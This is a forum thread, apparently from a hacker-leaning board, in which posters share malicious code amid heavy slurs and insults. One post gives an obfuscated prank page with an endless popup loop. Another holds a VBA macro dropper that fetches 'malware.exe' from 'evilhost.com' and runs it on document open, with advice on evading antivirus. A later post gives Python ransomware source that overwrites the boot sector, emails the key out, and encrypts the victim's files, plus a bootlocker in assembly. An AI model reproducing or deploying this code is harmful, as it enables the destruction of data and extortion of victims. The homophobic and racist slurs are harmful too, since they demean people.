User Controls

Let's talk crypto.

  1. #21
    Sophie Pedophile Tech Support
    Is this your ransomware, Sophie?

    http://money.cnn.com/2016/03/28/tech...hospital-hack/

    I wish. I lol'd when i read that though.

    It's basically harmless. Just a fork bomb.

    Yeah i remember from redfern, thanks but no thanks.
  2. #22
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Yeah i remember from redfern, thanks but no thanks.

    C'mon, now.
  3. #23
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Ten points to the person who knows how I encrypted it in such a way that any browser can still parse it.
  4. #24
    Lanny Bird of Courage
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
  5. #25
    -SpectraL coward [the spuriously bluish-lilac bushman]
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace

    The title says, "Let's talk crypto".
  6. #26
    Sophie Pedophile Tech Support
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace

    At this point i just think he does it for the attention.
  7. #27
    -SpectraL coward [the spuriously bluish-lilac bushman]
    At this point i just think he does it for the attention.

    And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
  8. #28
    Sophie Pedophile Tech Support
    And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?

    That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.

    inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet
  9. #29
    -SpectraL coward [the spuriously bluish-lilac bushman]
    That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.

    inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet

    Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
  10. #30
    Sophie Pedophile Tech Support
    Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.

    Kill yourself, i post more quality content in a week than you do in a year.
  11. #31
    aldra JIDF Controlled Opposition

    <html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <script language="JavaScript">
    <!--
    function ZOKLock()
    {
    var h=new Array
    (

    '<!--*******************************************',
    ' This page protected by Yomoma ZokLock ',
    ' Copyright (C) Yomoma Software Co. 2001-2002 ',
    ' http://www.disney.com/ ',
    '********************************************-->',

    //Page Begin
    '6B',
    't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
    '@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
    'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
    '*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
    'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
    '$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
    '39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
    '3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
    '&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
    'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
    'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
    '3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
    ',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
    '$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
    );
    //Page End

    var pw='default';
    var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ';

    var x='0123456789ABCDEF';
    var i,j,xs;
    var c=0;

    for(i=0;i<pw.length;i++)
    c=c^t.indexOf(pw.charAt(i));

    if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
    {
    }

    for(i=0;i<5;i++)
    document.writeln(h[i]);

    for(i=0;i<40;i++)
    document.writeln();

    var n=pw.length;
    var m=0;
    var s='';
    for(j=6;j<h.length;j++)
    {
    for(i=0;i<h[j].length;i++)
    {
    xs=h[j].charAt(i)
    if(x.indexOf(xs)>=0)
    {
    i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
    }
    else
    c=t.indexOf(xs);
    c=c^44^t.indexOf(pw.charAt(m));
    m++;
    if(m==n)
    m=0;
    if(c==13)
    {
    document.writeln(s);s='';
    }
    else if(c==10)
    {
    ;
    }
    else
    s=s+t.charAt(c);
    }
    }

    document.writeln(s);

    return true;
    }

    var ie=0;
    if(navigator.appName.indexOf('Microsoft')>=0)
    {
    ie=1;ZOKLock();
    }

    function ZOKLock2()
    {
    if(ie==0)
    ZOKLock();
    }
    // -->

    </script></head><body onLoad="ZOKLock2();"></body></html>



    <html>
    <head>
    <script language="JavaScript">
    <!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
    </script>
    <script LANGUAGE="JavaScript" SRC="prot.js"></script>
    <title>So Many Browsers So Little Time</title>
    </head>
    <body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
    <form method="POST">
    <p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
    </form>
    </body>
    <script language="JavaScript">
    <!-- window.open = SymRealWinOpen; //-->
    </script>
    </html>


  12. #32
    Sophie Pedophile Tech Support

    <html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <script language="JavaScript">
    <!--
    function ZOKLock()
    {
    var h=new Array
    (

    '<!--*******************************************',
    ' This page protected by Yomoma ZokLock ',
    ' Copyright (C) Yomoma Software Co. 2001-2002 ',
    ' http://www.disney.com/ ',
    '********************************************-->',

    //Page Begin
    '6B',
    't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
    '@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
    'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
    '*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
    'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
    '$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
    '39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
    '3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
    '&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
    'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
    'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
    '3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
    ',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
    '$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
    );
    //Page End

    var pw='default';
    var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ';

    var x='0123456789ABCDEF';
    var i,j,xs;
    var c=0;

    for(i=0;i<pw.length;i++)
    c=c^t.indexOf(pw.charAt(i));

    if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
    {
    }

    for(i=0;i<5;i++)
    document.writeln(h[i]);

    for(i=0;i<40;i++)
    document.writeln();

    var n=pw.length;
    var m=0;
    var s='';
    for(j=6;j<h.length;j++)
    {
    for(i=0;i<h[j].length;i++)
    {
    xs=h[j].charAt(i)
    if(x.indexOf(xs)>=0)
    {
    i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
    }
    else
    c=t.indexOf(xs);
    c=c^44^t.indexOf(pw.charAt(m));
    m++;
    if(m==n)
    m=0;
    if(c==13)
    {
    document.writeln(s);s='';
    }
    else if(c==10)
    {
    ;
    }
    else
    s=s+t.charAt(c);
    }
    }

    document.writeln(s);

    return true;
    }

    var ie=0;
    if(navigator.appName.indexOf('Microsoft')>=0)
    {
    ie=1;ZOKLock();
    }

    function ZOKLock2()
    {
    if(ie==0)
    ZOKLock();
    }
    // -->

    </script></head><body onLoad="ZOKLock2();"></body></html>



    <html>
    <head>
    <script language="JavaScript">
    <!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
    </script>
    <script LANGUAGE="JavaScript" SRC="prot.js"></script>
    <title>So Many Browsers So Little Time</title>
    </head>
    <body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
    <form method="POST">
    <p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
    </form>
    </body>
    <script language="JavaScript">
    <!-- window.open = SymRealWinOpen; //-->
    </script>
    </html>



    Of course you are fee to post what you want. But seeing as i value your expertise and appreciate and respect your opinion in the infosec/programming field i was hoping you'd share your thoughts on crypto and ransomware in general. If you have anything interesting to add i'd love to hear about. Just ignore spectral, he's just a skid trying to look cool.

    For delivery of the ransomware i had the folling in mind:

    A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;
    • Encrypt all strings present in your VBA code
    • Encrypt data from your python Script in VBA code (domain names or paths for example)
    • Randomize each functions' (or variables) names
    • Choose Encryption method, how and where encryption keys are stored
    • Generate as many unique MS Office documents as you want using a file name list and a document template
    • Enable autodestruction of encryption Keys feature once the VBA has been triggered once

    As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:


    Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
    [rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string


    Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.




    Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

    Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.

    https://github.com/CloudStrief/xcode...doc/skript.txt


    Option Explicit

    Public CN As String
    Public APD As String
    Public UN As String
    Public HOSTNAME As String
    Public DROPPER_EXE As String
    Public PAYLOADS_FOLDER As String
    Public PAYLOAD_FILE As String

    Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
    End Function


    Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String

    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")

    oShell.Run APD + DROPPER_EXE
    FN = APD

    On Error GoTo 0
    End Sub

    Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
    End Sub

    Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE

    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"

    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
    End Function



    This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.

    https://github.com/CloudStrief/xcode
  13. #33
    -SpectraL coward [the spuriously bluish-lilac bushman]
    <!– function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //–>
    </script>

    You one smart cookie. Is your name really... Oddballz194... by any chance? Not many people can do what you just did thar.
  14. #34
    Ajax African Astronaut [rumor the placative aphakia]
    You one smart cookie. Is your name really… Oddballz194… by any chance? Not many people can do what you just did thar.

    You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.
  15. #35
    -SpectraL coward [the spuriously bluish-lilac bushman]
    You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.

    I'mma still gonna guess Oddballz_194. Call me crazy.

    If I had to take a second guess, I'd have to go with Fish.
  16. #36
    Sophie Pedophile Tech Support
    *Resurrects thread*

    Ahh, when this idea was still just that, an idea.


    import os
    import sys
    import random
    import struct
    import smtplib
    import string
    import datetime
    import time

    import getpass as gp

    from Crypto.Cipher import AES
    from Crypto.PublicKey import RSA
    from multiprocessing import Pool


    ID = ''
    key = RSA.generate(2048)
    exKey = RSA.exportKey('PEM')


    if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
    os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
    pass
    else:
    try:
    os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
    pass


    def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    global ID
    ID = ''.join(random.choice(chars) for _ in range(size))


    def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"
    PORT = 587
    USER= "address@gmail.com" # Specify Username Here
    PASS= "prettyflypassword" # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:
    server = smtplib.SMTP()
    server.connect(SERVER, PORT)
    server.starttls()
    server.login(USER, PASS)
    server.sendmail(FROM, TO, message)
    server.quit()
    except Exception as e:
    # print e
    pass



    def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
    out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
    with open(out_filename, 'wb') as outfile:
    outfile.write(struct.pack('<Q', filesize))
    outfile.write(iv)

    while True:
    chunk = infile.read(chunksize)
    if len(chunk) == 0:
    break
    elif len(chunk) % 16 != 0:
    chunk += ' ' * (16 - len(chunk) % 16)

    outfile.write(encryptor.encrypt(chunk))



    def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

    def selectfiles():

    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
    ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
    ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
    ".jpg",".jpeg",".png", ".tiff", ".zip", ".7z", ".exe",
    ".tar.gz", "tar", ".mp3", ".sh", ".c", ".h", ".txt"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
    for file in files:
    if file.endswith(tuple(ext)):
    files_to_enc.push(os.path.join(root, file))

    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)


    def note():

    readme = """

    .d8888b. 888
    d88P Y88b 888
    888 888 888
    888 888 888 88888b. 88888b. .d88b. 888d888
    888 888 888 888 "88b 888 "88b d8P Y8b 888P"
    888 888 888 888 888 888 888 888 88888888 888
    Y88b d88P Y88b 888 888 d88P 888 888 Y8b. 888
    "Y8888P" "Y88888 88888P" 888 888 "Y8888 888
    888 888
    Y8b d88P 888
    "Y88P" 888



    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible to retrieve
    without aquiring the encryption key and decrypting binary. As of yet these are not available to you since the Cypher ransomware is
    still under construction. We thank you for your patience.

    Have a nice day,

    The Cypher Project."""

    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"

    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"

    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()

    if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()

    try:
    selectfiles()
    note()
    except Exception as e:
    pass




    Bootlocker source in asm.


    [BITS 16]
    [ORG 0x7C00]
    MOV SI, Msg
    CALL OutStr
    JMP $
    OutChar:
    MOV AH, 0x0E
    MOV BH, 0x00
    MOV BL, 0x07
    INT 0x10
    RET
    OutStr:
    next_char:
    MOV AL, [SI]
    INC SI
    OR AL, AL
    JZ exit_function
    CALL OutChar
    JMP next_char
    exit_function:
    RET
    Msg db 0xA, 0xD, 0xA, 0xD
    db '########################################################', 0xA, 0xD
    db '# Your harddrive is encrypted with military grade #', 0xA, 0xD
    db '# encryption, you wont get your files back, since #', 0xA, 0xD
    db '# the Cypher ransomware is still under construction #', 0xA, 0xD
    db ' ', 0xA, 0xD
    db '########################################################', 0xA, 0xD, 0xA, 0xD
    db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
    db 'Have a nice day,', 0xA, 0xD
    db ' The Cypher Project', 0
    TIMES 510 - ($ - $$) db 0
    DW 0xAA55



    Compile ASM with NASM to boot.bin

    I think i did a pretty good job so far.
  17. #37
    Ghast Houston
    let us
  18. #38
    cryptographiccontrarian African Astronaut
    no you guys dont know shit all u gotta do is draw an ellipse and connect 2 pointz
  19. #39
    Migh Houston
    Originally posted by Ghast let us

    Oh shit, you bumped a six year old thread and make me regret not investing earlier.
  20. #40
    34nfi4w8g3wnfge4j93qrj309jg Houston [my metonymically tentacled thales]
    Originally posted by Migh Oh shit, you bumped a six year old thread and make me regret not investing earlier.

    It's okay , I did the same except for that recent crash remember that

    well I bought the top

    it happens

    its all about timing the market vs time in the market am I right fungazis
Jump to Top